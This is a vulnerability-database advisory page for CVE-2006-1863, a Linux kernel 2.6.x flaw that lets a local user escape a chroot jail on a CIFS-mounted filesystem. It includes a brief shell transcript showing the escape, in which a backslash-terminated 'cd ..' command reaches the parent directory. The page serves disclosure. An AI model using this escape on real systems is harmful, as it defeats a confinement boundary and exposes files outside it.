Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2006-1863

Publish Date: 28 Apr 2006

                							

                source: http://www.securityfocus.com/bid/17742/info

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
&lt;list of files from parent&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass

Vulmon Search

About

Products

Connect